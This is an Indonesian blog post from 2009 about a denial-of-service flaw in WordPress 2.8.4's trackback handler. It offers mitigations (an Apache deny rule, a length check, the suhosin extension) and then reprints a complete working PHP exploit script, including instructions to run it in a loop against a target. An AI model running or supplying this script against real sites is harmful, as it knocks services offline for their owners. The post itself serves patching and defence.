Mencegah serangan 0-day Exploit Wordpress 2.8.4

Kabar yang saya dapat dari tred ini bahwa telah ditemukan exploit pada wordpres 2.8.4. Exploit ini sifatnya DOS (Denial Of Service) yaitu dengan melakukan pengiriman paket data secara terus menerus sehingga mengakibatkan sever kelebihan beban. Exploit ini memanfaatkan kelemahan wp-trackbacks.php.

Solusi
–solusi 1 terbuburuk–
tambahkan rules di konfigurasi apache (httpd.conf) baris berikut
<Files ~ "wp-trackback.php">
Order allow,deny
Deny from all
</Files>

–solusi 2 –
pada baris ke #47 wp-trackback.php tambahkan
if(strlen($charset) > 50)
die;

–solusi 3 –
silahkan install suhosin, karena dari hasil test suhosin kurang lebih terbukti bisa memblokir serangan tsb

berikut hasil log suhosin :

Oct 21 12:17:27 server suhosin[26063]: ALERT – configured request variable value length limit exceeded – dropped vari able ‘title’ (attacker ‘64.243.53.34′, file ‘/home/domainku/domains/domainku.com/public_html/wp-trackback.php’)

berikut script Eksploit 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

<?php
/*
* wordpress Resource exhaustion Exploit
* http://rooibo.wordpress.com/
* security@wordpress.org contacted and get a response,
* but no solution available.
*
* [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org
 
*
* exploiting:
* you must install php-cli (command line interface)
* $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
*
*/
if(count($argv) < 2)
die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
$path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){ $fp = @fsockopen($data['host'],80); if(!$fp) die("unable to connect to: ".$data['host']."\n"); $pid[$n] = pcntl_fork(); if(!$pid[$n]){ fputs($fp, "POST $path HTTP/1.1\r\n"); fputs($fp, "Host: ".$data['host']."\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: ".strlen($str)."\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $str."\r\n\r\n"); echo "hit!\n"; } }
?>

Sumber :
http://www.diskusiwebhosting.com/showthread.php?t=1784
http://jarraltech.com/2009/10/new-0-day-wordpress-exploit/

Incoming search terms for the article:

Related posts:

  1. Installatron Upgrade Wordpress 2.8.5 Fix DOS 0-day exploit Segera upgrade wordpress anda melalui installatron dari versi 2.8.4 ke...
  2. Directadmin Roundcube Exploit ditemukan Pengguna DA segera update Bagi yang menggunakan hosting panel directadmin dan melakukan upgrade sebelum...
  3. Contact form jquery Wordpress plugin Sebelumnya saya sudah memposting artikel yang sama yang bisa di...

Related posts brought to you by Yet Another Related Posts Plugin.

This entry was written by hadi and posted on Oktober 21, 2009 at 3:10 pm and filed under Hacking, Linux, Tips & Trick. Bookmark the permalink. Follow any comments here with the RSS feed for this post.

3 Responses to “Mencegah serangan 0-day Exploit Wordpress 2.8.4”

  1. 1
    Installatron Upgrade Wordpress 2.8.5 Fix DOS 0-day exploit | Web Hosting Surabaya Blogs Says:
    Oktober 24th, 2009 at 12:27 am

    [...] ke 2.8.5. Upgrade wordpres bertujuan untuk menutup celah keamanan yang berhasil dimanfaatkan oleh 0-day Exploit  melakukan DDOS pada [...]

  2. 2
    sains Says:
    Oktober 24th, 2009 at 1:33 am

    terus berkarya mas hadi…

  3. 3
    hadi Says:
    Oktober 27th, 2009 at 10:57 pm

    siap bos.

Leave a Reply